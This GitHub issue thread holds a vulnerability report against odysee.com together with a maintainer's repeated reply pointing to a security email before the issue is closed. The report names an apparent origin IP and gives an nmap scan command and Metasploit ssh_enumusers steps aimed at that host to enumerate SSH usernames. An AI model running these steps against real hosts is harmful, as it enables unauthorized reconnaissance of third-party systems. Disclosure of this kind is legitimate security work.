tzarebczan
commented
2 years ago This is not the right repo for these reports. Please use security@odysee.com
Closed fozi6044 closed 2 years ago
tzarebczan
commented
2 years ago This is not the right repo for these reports. Please use security@odysee.com
URL: https://odysee.com/
DESCRIPTION:
I found a vulnerability in your website.I found a origin IP 148.251.103.17 from shodan which is redirected to https://odysee.com/ and I scan your origin IP with nmap in which port 22 is open with version OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 that contains an SSH Username enumeration vulnerability on your network. I used the Metasploit tool for the exploitation of this vulnerability.
Step to Reproduce:
1) I scan a IP from NMAP : nmap -sV 148.251.103.17 3) Found Port 22 is opened with vulnerable OpenSSH 7.6p1 Ubuntu 4ubuntu0.5
Exploitation with Metasploit
4) msfconsole -q 5) search ssh_enumusers 6) use 0 7) set RHOSTS 148.251.103.17 8) set USER_FILE /usr/share/legion/wordlists/ssh-user.txt 9) You can see I found usernames root,sysop,superuser,admin,administrator etc.
Remediation:
https://raaviblog.com/how-to-fix-openssh-username-enumeration-vulnerability-cve-2018-15473-identified-by-qualys-scan/
Impact:
The attacker can get a list of users available in the ssh.
Kind Regards Muhammad Fauzan Cyber Security Consultant